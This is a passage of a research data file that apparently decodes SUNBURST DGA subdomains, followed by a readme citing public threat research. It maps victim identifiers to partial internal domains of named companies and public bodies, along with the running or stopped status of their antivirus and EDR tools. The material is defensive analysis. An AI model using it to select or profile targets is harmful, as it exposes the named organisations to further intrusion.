861 |  'e344015a0f2e5fd8': {0: 'pu8y'},
862 |  'e40bdef1a86c87e4': {1: 'ies.com'},
863 |  'e44d8c88c6352fc2': {'AV': ['Windows Defender Running',
864 |                              'CROWDSTRIKE RUNNING']},
865 |  'e5fafe265e86088e': {1: 'scroot.com',
866 |                       'AV': ['Windows Defender Running',
867 |                              'CROWDSTRIKE RUNNING',
868 |                              'CROWDSTRIKE STOPPED']},
869 |  'e6184b0a0ad0894f': {1: 'spsd.sk.ca'},
870 |  'e64a386da817b2e2': {1: 'cow.local'},
871 |  'e65a492095c752ae': {0: 'voice.booking.',
872 |                       1: 'com',
873 |                       'AV': ['CROWDSTRIKE RUNNING', 'CROWDSTRIKE STOPPED']},
874 |  'e6b017e5b84ee18f': {0: 'wardrobe.irobot'},
875 |  'e6b2e46c5ed604dd': {0: 'christieclinic.', 1: 'com'},
876 |  'e6fff04195432056': {0: 'ad.checkpoint.'},
877 |  'e7788c5af1aef13a': {1: 'kcpl.com',
878 |                       'AV': ['Windows Defender Running',
879 |                              'WINDOWS DEFENDER STOPPED']},
880 |  'e7b0c287c22c919a': {1: 'yhtpetd'},
881 |  'e7b7f0950deddcf0': {1: 'repsrv.com'},
882 |  'e8cf53154422826c': {'AV': []},
883 |  'e9329aa1db00da24': {0: 'vms.ad.varian'},
884 |  'e97571646b7f3d34': {1: 'loud.com'},
885 |  'ea0796c7e273d4ce': {1: 'ciena.com'},
886 |  'ea769b8596aa5ce1': {'AV': ['CROWDSTRIKE RUNNING']},
887 |  'eafaf4d17345358c': {0: 'prod.mobily.la'},
888 |  'eb0b28bbfa601068': {1: 'dtc.brflt.corp'},
889 |  'eb3401aa65a2667a': {0: 'corp.stratusnet'},
890 |  'eb65a394d88f97a0': {0: 'ebe.co.roanoke', 1: '.va.us'},
891 |  'ed197bd90249b906': {0: 'HQ.REOTr', 1: '-wwgi2xnl', 'AV': []},
892 |  'ed1aaf60def6f391': {'AV': ['Windows Defender Running']},
893 |  'ed54ab418c5fa394': {1: 'pqcorp.com'},
894 |  'edf7c3fe1e16bd67': {'AV': ['Windows Defender Running',
895 |                              'CARBONBLACK RUNNING']},
896 |  'ee1209ab0ece0841': {0: 'CONSOLID', 'AV': []},
897 |  'ee458972a9bd484c': {1: 'agloan.ads', 'AV': []},
898 |  'ee4a9c4df37aa578': {0: 'e-idsolutions.',
899 |                       'AV': ['ESET RUNNING', 'ESET STOPPED']},
900 |  'ee52cf7f78fb90b7': {0: 'amr.corp.intel'},
901 |  'ef5776fca7940bc3': {0: 'gunnersens.com',
902 |                       1: '.au',
903 |                       'AV': ['Windows Defender Running']},
904 |  'ef5d9ad9da431fc7': {'AV': []},
905 |  'efc58135af79f44a': {1: 'nvidia.com',
906 |                       'AV': ['Windows Defender Running',
907 |                              'WINDOWS DEFENDER STOPPED',
908 |                              'FIREEYE RUNNING',
909 |                              'FIREYE STOPPED']},
910 |  'efd2d0e70ac4880b': {0: 'gvl.is.l-3com'},
911 |  'effdce2549b3c106': {'AV': ['Windows Defender Running',
912 |                              'ESET RUNNING',
913 |                              'ESET STOPPED']},
914 |  'f03d25eb0b572d04': {},
915 |  'f046ee0c288ec17e': {1: 'sdch.local'},
916 |  'f0532b738d4052d9': {'AV': ['Windows Defender Running']},
917 |  'f0f05e522df7fa26': {'AV': ['Windows Defender Running',
918 |                              'ESET RUNNING',
919 |                              'ESET STOPPED']},
920 |  'f136b6f2b64054f1': {'AV': []},
921 |  'f158c8d797c37580': {1: 'pcsco.com'},
922 |  'f18613981dec4d1a': {0: 'CentralY'},
923 |  'f1e9a45efc313148': {1: 'jj9gqy'},
924 |  'f2499a9083c46820': {0: 'lasers.state.l', 1: 'a.us', 'AV': []},
925 |  'f2b7f287ee4f3c49': {1: 'l'},
926 |  'f2ea55f0ac8ef45b': {0: 'cityofsacramento'},
927 |  'f358cb8580dc0040': {1: 'pslab.local', 'AV': ['Windows Defender Running']},
928 |  'f37f79372d777da3': {1: '7auo7357zllc'},
929 |  'f499f3b047583515': {0: 'FIRSTSTA'},
930 |  'f49a7e0543d9d629': {1: 'dsh.ca.gov'},
931 |  'f59bbaacba3493c0': {0: 'dufferincounty.',
932 |                       1: 'on.ca',
933 |                       'AV': ['Windows Defender Running']},
934 |  'f5d6aa262381b084': {1: 'glu.com',
935 |                       'AV': ['Windows Defender Running',
936 |                              'CROWDSTRIKE RUNNING']},
937 |  'f608e0099fb9d068': {0: 'csnt.princegeor'},
938 |  'f6160f85f62f4e87': {0: 'RPM.loca', 'AV': ['Windows Defender Running']},
939 |  'f809dac9a0bf388c': {1: 'int.sap.corp'},
940 |  'f80d748a94b58ebd': {1: 'wz.hasbro.com'},
941 |  'f9024d5b1e9717c6': {1: 'gyldendal.local',
942 |                       'AV': ['Windows Defender Running']},
943 |  'f90bddb47e495629': {0: 'central.pima.g', 1: 'ov', 'AV': []},
944 |  'f956b5ef56bcf666': {1: 'coxnet.cox.com', 'AV': ['Windows Defender Running']},
945 |  'f9a9387f7d252842': {0: 'city.kingston.',
946 |                       1: 'on.ca',
947 |                       'AV': ['Windows Defender Running',
948 |                              'WINDOWS DEFENDER STOPPED']},
949 |  'fb0b50553bc00ded': {0: 'gloucesterva.ne',
950 |                       1: 't',
951 |                       'AV': ['Windows Defender Running']},
952 |  'fb1a190417704786': {1: 'otu3'},
953 |  'fbb6164bc2b0dfad': {0: 'ARYZTA.C',
954 |                       1: 'nf',
955 |                       'AV': ['Windows Defender Running']},
956 |  'fc07eb59e028d3ee': {'AV': []},
957 |  'fc2d18331c2d85c4': {1: 'ah.org'},
958 |  'fc653424daee0fb6': {1: 'guww.net'},
959 |  'fd04ac52c95a1b0a': {1: 'bmrn.com'},
960 |  'fdfcab8e4c0ab3ee': {1: 'ansc.gob.pe'},
961 |  'fe5d1ec6c42c9b9f': {0: 'ni.corp.natins'},
962 |  'fe7ff8c9104a0508': {1: 'thoughtspot.int',
963 |                       'AV': ['Windows Defender Running']},
964 |  'ff02000000000000': {'AV': ['WINDOWS DEFENDER ATP RUNNING',
965 |                              'MS DEFENDER ID STOPPED',
966 |                              'CARBONBLACK RUNNING',
967 |                              'CarbonBlack STOPPED',
968 |                              'FIREEYE RUNNING',
969 |                              'ESET STOPPED',
970 |                              'FSECURE RUNNING',
971 |                              'FSECURE STOPPED']},
972 |  'ff5c691b07de447d': {'AV': ['Windows Defender Running']},
973 |  'ff6760f36db3d7dc': {1: 'smes.org', 'AV': ['Windows Defender Running']},
974 |  'ffffab794bbbcd89': {0: 'its.iastate.ed'}}
975 | 


--------------------------------------------------------------------------------
/sunburst_dga/readme.md:
--------------------------------------------------------------------------------
 1 | Data from:
 2 | https://pastebin.com/raw/6EDgCKxd
 3 | https://raw.githubusercontent.com/bambenek/research/main/sunburst/uniq-hostnames.txt
 4 | 
 5 | Script based on existing research from:
 6 | https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html
 7 | QiAnXin CERT -  https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug
 8 | and QiAnXin_RedDrip - @RedDrip7
 9 | 
10 | 
11 | 


--------------------------------------------------------------------------------